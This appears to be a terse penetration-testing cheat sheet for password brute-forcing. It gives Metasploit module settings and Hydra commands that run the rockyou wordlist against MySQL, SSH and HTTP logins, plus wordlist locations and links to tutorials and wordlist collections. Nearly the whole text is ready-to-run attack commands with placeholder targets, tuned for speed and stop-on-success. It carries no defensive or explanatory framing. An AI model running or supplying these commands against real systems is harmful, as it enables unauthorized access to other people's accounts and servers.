assuming you got some dictionaries ready already
use scanner/mysql/mysql_login set PASS_FILE /usr/share/wordlists/rockyou.txt set USER_FILE /usr/share/wordlists/users.txt set RHOSTS x.x.x.x #set USERNAME root set STOP_ON_SUCCESS true set BLANK_PASSWORDS true run
note there are many wordlists here that come with metasploit
/opt/metasploit-framework/data/wordlists/
assuming password-based auth for once
ideally you got a user name or user DB target. this is just example against root
with MSF
use auxiliary/scanner/ssh/ssh_login show options set RHOSTS x.x.x.x set STOP_ON_SUCCESS true set THREADS 100 set USERNAME root set PASS_FILE /var/tmp/rockyou.txt run
–or– with Hydra
apt install hydra hydra -t 4 -l root -P /var/tmp/rockyou.txt ssh://$target #hydra -L usernames.txt -p password 192.168.1.1 http-get / -s 80
use auxiliary/scanner/http/http_login set AUTH_URI /share/ set BLANK_PASSWORDS true ... set VERBOSE false run
Metasploit - Brute-Force Attacks https://www.tutorialspoint.com/metasploit/metasploit_brute_force_attacks.htm
Bruteforce MySQL Using Metasploit… https://0xzoidberg.wordpress.com/2010/07/03/bruteforce-mysql-using-metasploit/
Cracking Network Passwords (Hydra) https://netsec.ws/?p=353
https://github.com/random-robbie/bruteforce-lists
https://github.com/Bo0oM/fuzz.txt
https://github.com/berzerk0/Probable-Wordlists